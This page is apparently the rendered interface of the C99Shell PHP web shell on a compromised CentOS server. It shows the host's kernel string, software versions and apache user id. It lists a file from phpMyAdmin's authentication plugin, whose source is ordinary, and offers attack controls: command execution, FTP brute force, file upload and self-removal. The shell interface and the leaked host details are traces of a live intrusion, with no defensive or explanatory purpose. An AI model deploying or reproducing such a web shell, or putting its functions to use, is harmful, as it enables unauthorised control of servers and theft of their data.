!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/usr/share/phpMyAdmin/libraries/plugins/auth/   drwxr-xr-x
Free 8.93 GB of 93.48 GB (9.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AuthenticationHttp.class.php (10.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * HTTP Authentication plugin for phpMyAdmin.
 * NOTE: Requires PHP loaded as a Apache module.
 *
 * @package    PhpMyAdmin-Authentication
 * @subpackage HTTP
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

/* Get the authentication interface */
require_once 'libraries/plugins/AuthenticationPlugin.class.php';

/**
 * Handles the HTTP authentication methods
 *
 * @package PhpMyAdmin-Authentication
 */
class AuthenticationHttp extends AuthenticationPlugin
{
    
/**
     * Displays authentication form and redirect as necessary
     *
     * @global  string    the font face to use in case of failure
     * @global  string    the default font size to use in case of failure
     * @global  string    the big font size to use in case of failure
     *
     * @return boolean   always true (no return indeed)
     */
    
public function auth()
    {
        
$response PMA_Response::getInstance();
        if (
$response->isAjax()) {
            
$response->isSuccess(false);
            
// reload_flag removes the token parameter from the URL and reloads
            
$response->addJSON('reload_flag''1');
            if (
defined('TESTSUITE')) {
                return 
true;
            } else {
                exit;
            }
        }

        return 
$this->authForm();
    }

    
/**
     * Displays authentication form
     *
     * @return boolean
     */
    
public function authForm()
    {
        
/* Perform logout to custom URL */
        
if (! empty($_REQUEST['old_usr'])
            && ! empty(
$GLOBALS['cfg']['Server']['LogoutURL'])
        ) {
            
PMA_sendHeaderLocation($GLOBALS['cfg']['Server']['LogoutURL']);
            if (! 
defined('TESTSUITE')) {
                exit;
            } else {
                return 
false;
            }
        }

        if (empty(
$GLOBALS['cfg']['Server']['auth_http_realm'])) {
            if (empty(
$GLOBALS['cfg']['Server']['verbose'])) {
                
$server_message $GLOBALS['cfg']['Server']['host'];
            } else {
                
$server_message $GLOBALS['cfg']['Server']['verbose'];
            }
            
$realm_message 'phpMyAdmin ' $server_message;
        } else {
            
$realm_message $GLOBALS['cfg']['Server']['auth_http_realm'];
        }
        
// remove non US-ASCII to respect RFC2616
        
$realm_message preg_replace('/[^\x20-\x7e]/i'''$realm_message);
        
header('WWW-Authenticate: Basic realm="' $realm_message .  '"');
        
header('HTTP/1.0 401 Unauthorized');
        if (
php_sapi_name() !== 'cgi-fcgi') {
            
header('status: 401 Unauthorized');
        }

        
/* HTML header */
        
$response PMA_Response::getInstance();
        
$response->getFooter()->setMinimal();
        
$header $response->getHeader();
        
$header->setTitle(__('Access denied!'));
        
$header->disableMenuAndConsole();
        
$header->setBodyId('loginform');

        
$response->addHTML('<h1>');
        
$response->addHTML(sprintf(__('Welcome to %s'), ' phpMyAdmin'));
        
$response->addHTML('</h1>');
        
$response->addHTML('<h3>');
        
$response->addHTML(
            
PMA_Message::error(
                
__('Wrong username/password. Access denied.')
            )
        );
        
$response->addHTML('</h3>');

        if (
file_exists(CUSTOM_FOOTER_FILE)) {
            include 
CUSTOM_FOOTER_FILE;
        }

        if (! 
defined('TESTSUITE')) {
            exit;
        } else {
            return 
false;
        }
    }

    
/**
     * Gets advanced authentication settings
     *
     * @global  string $PHP_AUTH_USER   the username if register_globals is on
     * @global  string $PHP_AUTH_PW     the password if register_globals is on
     * @global  array                   the array of server variables if
     *                                  register_globals is off
     * @global  array                   the array of environment variables if
     *                                  register_globals is off
     * @global  string                  the username for the ? server
     * @global  string                  the password for the ? server
     * @global  string                  the username for the WebSite Professional
     *                                  server
     * @global  string                  the password for the WebSite Professional
     *                                  server
     * @global  string                  the username of the user who logs out
     *
     * @return boolean   whether we get authentication settings or not
     */
    
public function authCheck()
    {
        global 
$PHP_AUTH_USER$PHP_AUTH_PW;

        if (
$GLOBALS['token_provided'] && $GLOBALS['token_mismatch']) {
            return 
false;
        }

        
// Grabs the $PHP_AUTH_USER variable whatever are the values of the
        // 'register_globals' and the 'variables_order' directives
        
if (empty($PHP_AUTH_USER)) {
            if (
PMA_getenv('PHP_AUTH_USER')) {
                
$PHP_AUTH_USER PMA_getenv('PHP_AUTH_USER');
            } elseif (
PMA_getenv('REMOTE_USER')) {
                
// CGI, might be encoded, see below
                
$PHP_AUTH_USER PMA_getenv('REMOTE_USER');
            } elseif (
PMA_getenv('REDIRECT_REMOTE_USER')) {
                
// CGI, might be encoded, see below
                
$PHP_AUTH_USER PMA_getenv('REDIRECT_REMOTE_USER');
            } elseif (
PMA_getenv('AUTH_USER')) {
                
// WebSite Professional
                
$PHP_AUTH_USER PMA_getenv('AUTH_USER');
            } elseif (
PMA_getenv('HTTP_AUTHORIZATION')
                && 
false === strpos(PMA_getenv('HTTP_AUTHORIZATION'), '<')
            ) {
                
// IIS, might be encoded, see below; also prevent XSS
                
$PHP_AUTH_USER PMA_getenv('HTTP_AUTHORIZATION');
            } elseif (
PMA_getenv('Authorization')) {
                
// FastCGI, might be encoded, see below
                
$PHP_AUTH_USER PMA_getenv('Authorization');
            }
        }
        
// Grabs the $PHP_AUTH_PW variable whatever are the values of the
        // 'register_globals' and the 'variables_order' directives
        
if (empty($PHP_AUTH_PW)) {
            if (
PMA_getenv('PHP_AUTH_PW')) {
                
$PHP_AUTH_PW PMA_getenv('PHP_AUTH_PW');
            } elseif (
PMA_getenv('REMOTE_PASSWORD')) {
                
// Apache/CGI
                
$PHP_AUTH_PW PMA_getenv('REMOTE_PASSWORD');
            } elseif (
PMA_getenv('AUTH_PASSWORD')) {
                
// WebSite Professional
                
$PHP_AUTH_PW PMA_getenv('AUTH_PASSWORD');
            }
        }

        
// Decode possibly encoded information (used by IIS/CGI/FastCGI)
        // (do not use explode() because a user might have a colon in his password
        
if (strcmp(substr($PHP_AUTH_USER06), 'Basic ') == 0) {
            
$usr_pass base64_decode(substr($PHP_AUTH_USER6));
            if (! empty(
$usr_pass)) {
                
$colon strpos($usr_pass':');
                if (
$colon) {
                    
$PHP_AUTH_USER substr($usr_pass0$colon);
                    
$PHP_AUTH_PW substr($usr_pass$colon 1);
                }
                unset(
$colon);
            }
            unset(
$usr_pass);
        }

        
// sanitize username
        
$PHP_AUTH_USER PMA_sanitizeMySQLUser($PHP_AUTH_USER);

        
// User logged out -> ensure the new username is not the same
        
$old_usr = isset($_REQUEST['old_usr']) ? $_REQUEST['old_usr'] : '';
        if (! empty(
$old_usr)
            && (isset(
$PHP_AUTH_USER) && hash_equals($old_usr$PHP_AUTH_USER))
        ) {
            
$PHP_AUTH_USER '';
            
// -> delete user's choices that were stored in session
            
if (! defined('TESTSUITE')) {
                
session_destroy();
            }
        }

        
// Returns whether we get authentication settings or not
        
if (empty($PHP_AUTH_USER)) {
            return 
false;
        } else {
            return 
true;
        }
    }

    
/**
     * Set the user and password after last checkings if required
     *
     * @global  array   $cfg           the valid servers settings
     * @global  integer $server        the id of the current server
     * @global  array                  the current server settings
     * @global  string  $PHP_AUTH_USER the current username
     * @global  string  $PHP_AUTH_PW   the current password
     *
     * @return boolean   always true
     */
    
public function authSetUser()
    {
        global 
$cfg$server;
        global 
$PHP_AUTH_USER$PHP_AUTH_PW;

        
// Ensures valid authentication mode, 'only_db', bookmark database and
        // table names and relation table name are used
        
if (! hash_equals($cfg['Server']['user'], $PHP_AUTH_USER)) {
            
$servers_cnt count($cfg['Servers']);
            for (
$i 1$i <= $servers_cnt$i++) {
                if (isset(
$cfg['Servers'][$i])
                    && (
$cfg['Servers'][$i]['host'] == $cfg['Server']['host']
                    && 
hash_equals($cfg['Servers'][$i]['user'], $PHP_AUTH_USER))
                ) {
                    
$server        $i;
                    
$cfg['Server'] = $cfg['Servers'][$i];
                    break;
                }
            } 
// end for
        
// end if

        
$cfg['Server']['user']     = $PHP_AUTH_USER;
        
$cfg['Server']['password'] = $PHP_AUTH_PW;

        
// Avoid showing the password in phpinfo()'s output
        
unset($GLOBALS['PHP_AUTH_PW']);
        unset(
$_SERVER['PHP_AUTH_PW']);

        
$this->setSessionAccessTime();

        return 
true;
    }

    
/**
     * User is not allowed to login to MySQL -> authentication failed
     *
     * @return boolean   always true (no return indeed)
     */
    
public function authFails()
    {
        
$error $GLOBALS['dbi']->getError();
        if (
$error && $GLOBALS['errno'] != 1045) {
            
PMA_fatalError($error);
        } else {
            
$this->authForm();
            return 
true;
        }
    }

    
/**
     * Callback when user changes password.
     *
     * @param string $password New password to set
     *
     * @return void
     */
    
public function handlePasswordChange($password)
    {
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0049 ]--